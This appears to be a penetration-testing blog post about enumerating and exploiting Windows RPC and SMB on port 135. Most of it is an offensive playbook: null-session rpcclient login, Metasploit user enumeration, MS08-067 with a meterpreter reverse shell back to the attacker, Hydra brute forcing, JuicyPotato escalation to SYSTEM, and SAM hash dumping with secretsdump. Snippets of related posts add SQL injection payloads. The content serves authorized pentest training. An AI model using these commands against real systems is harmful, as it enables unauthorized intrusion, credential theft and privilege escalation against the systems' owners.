Skip to main content

RPC Client Enumeration - Port 135

Pivoting for Red Teamers

Using rpcclient via Metasploit for Enumeration & Exploitation

rpcclient is a powerful tool used for enumerating and interacting with Windows RPC services. It is commonly used in penetration testing to extract usernames, groups, and policies from Windows machines.

Using rpcclient Manually (Without Metasploit)

If you already have valid credentials (or null session access), you can use rpcclient from Kali Linux:

rpcclient -U "" <TARGET_IP>

or

rpcclient -U "guest" <TARGET_IP>

🔹 If it prompts for a password, just press Enter to attempt a null session login.

Common Enumeration Commands


enumdomusers   # Enumerate domain users
queryuser <RID>  # Get user details (Replace <RID> with a user RID)
enumdomgroups  # Enumerate groups
querygroup <RID>  # Get group details
getsid  # Get security identifier (SID)
lookupnames <USERNAME>  # Get RID of a user

Using Metasploit’s rpcclient Modules

Step 1: Start Metasploit

msfconsole

Step 2: Use the SMB Login Module


use auxiliary/scanner/smb/smb_login
set RHOSTS <TARGET_IP>
set USERNAME <USER>
set PASSWORD <PASS>
run

✔ If it succeeds, you can use rpcclient with the valid credentials.

Step 3: Use auxiliary/scanner/smb/smb_enumusers


use auxiliary/scanner/smb/smb_enumusers
set RHOSTS <TARGET_IP>
set SMBDomain WORKGROUP
run

✔ This retrieves a list of valid Windows usernames via SMB.

Exploiting RPC Vulnerabilities

If RPC services are misconfigured or exploitable, you can try:

🔹 MS08-067 (EternalBlue Predecessor)


use exploit/windows/smb/ms08_067_netapi
set RHOST <TARGET_IP>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
run

✔ This exploits an old SMB vulnerability, useful for legacy systems.

🔹 Other SMB/RPC Exploits

search rpc
search smb

Pro Tips for Effective Enumeration

  • Try null sessions (-U "") – Some systems allow unauthenticated access.
  • Use smbclient – To check for SMB shares:
smbclient -L //<TARGET_IP> -N
  • Brute-force with Hydra if needed:
hydra -L users.txt -P passwords.txt smb://<TARGET_IP>
  • Combine rpcclient + smbclient to extract more data before exploitation.

RPC Client Exploitation and Privilege Escalation

Understanding `enumprivs` in RPCClient

When you run the following command in rpcclient, it lists the privileges of the user:

rpcclient -U "USERNAME" "TARGET_IP"
enumprivs

If it returns 35 privileges, it indicates that the user has extensive permissions, some of which can be exploited for privilege escalation.

High-Risk Privileges (Privilege Escalation)

Privilege Name Description and Attack Scenario
SeImpersonatePrivilege Allows token impersonation; can be exploited using JuicyPotato/RoguePotato.
SeAssignPrimaryTokenPrivilege Allows assigning tokens to processes; useful for privilege escalation.
SeBackupPrivilege Allows reading all files, including sensitive registry hives (SAM and SYSTEM).

Exploiting Dangerous Privileges

If you find SeImpersonatePrivilege, you can try JuicyPotato for SYSTEM access:

msfconsole
use exploit/windows/local/juicypotato
set SESSION "SESSION_ID"
run

Extracting SAM Hashes (If `SeBackupPrivilege` is Present)

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save

Then use `secretsdump.py`:

python3 secretsdump.py -sam sam.save -system system.save LOCAL

🔗 Conclusion

By analyzing the privileges returned by rpcclient, attackers can exploit misconfigurations and escalate privileges to SYSTEM using tools like JuicyPotato or by extracting registry hives.

Labels:

Comments

Post a Comment

Popular posts from this blog

Powershell Automation Basics - Part 1

Pentest Notes: PowerShell Automation - Basics Pentest Notes: PowerShell Automation - Basics These notes cover PowerShell automation for penetration testing, focusing on practical applications and techniques. What is PowerShell? A powerful scripting language and command-line shell built on the .NET framework, heavily integrated with Windows. Ideal for system administration and automation, making it a valuable tool for pentesters. Why PowerShell for Pentesting? Native to Windows: Pre-installed on most Windows systems. Object-oriented: Allows for complex data manipulation and interaction with APIs. Access to .NET Framework: Enables interaction with a vast library of classes and functions. Remoting capabilities: Execute commands on remote systems. Bypass security restrictions: Can be used to circumvent some security measures if not properly configured. Basic Syntax Cmdlets: Commands in PowerShell (e.g., Get-Process , Get-Service , Get-ChildItem ). P...
Post a Comment
Read more

SQLDB Pentest

Pivoting for Red Teamers SQL Database & SQL Injection Pentesting Cheat Sheet SQL databases store crucial application data, and misconfigurations can make them vulnerable to SQL Injection (SQLi) attacks. This guide covers database enumeration, privilege escalation, and SQL injection techniques. Step 1: Identifying SQL Database Type Check the database type by sending payloads in the input fields or URL: ' OR 1=1 -- (MySQL, PostgreSQL, MSSQL) ' UNION SELECT 1,2,3 -- (Check column count) ' AND 1=CONVERT(int,@@version) -- (MSSQL Test) Observe the error messages for database identification. Step 2: Enumerating Database Tables & Columns Use SQL queries to extract database structure. For MySQL: SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE(); SELECT column_name FROM information_schema.columns WHERE table_name='user...
Post a Comment
Read more

DAMN BASH

Bash Scripting: From Basic to Advanced Bash Scripting: From Basic to Advanced Bash (Bourne Again SHell) is a powerful command-line interpreter and scripting language commonly used in Linux and macOS environments. This post covers Bash scripting from basic commands to more advanced techniques. I. Basic Commands These commands are the building blocks of Bash scripting: Command Description ls Lists files and directories. cd Changes the current directory. pwd Prints the current working directory. mkdir Creates a new directory. rm Removes files or directories (use with caution!). cp Copies files or directories. mv Moves or renames files or directories. cat Displays file content. echo Prints text to the console. II. Variables Variables store data that can be used in your scripts: name="John Doe" echo "Hello, $name!" age=30 echo $((age + 5)) # Arithmetic operations III. Input/Output Redirection Redirect input an...
Post a Comment
Read more